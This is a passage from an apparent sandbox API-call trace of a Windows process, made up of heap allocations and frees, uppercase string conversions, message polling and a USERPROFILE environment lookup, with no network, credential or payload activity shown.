Size=0x4) returned 0x24b1908 [0204.335] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0204.335] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0204.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0204.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0204.337] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0204.337] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0204.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0204.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0204.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0204.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0204.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0204.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0204.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0204.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0204.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0204.340] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0204.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0204.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.340] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0204.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0204.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0204.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0204.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0204.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0204.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0204.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0204.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0204.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0204.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0204.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0204.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.344] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0204.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0204.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0204.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.345] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0204.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0204.346] RtlAllocateHeap 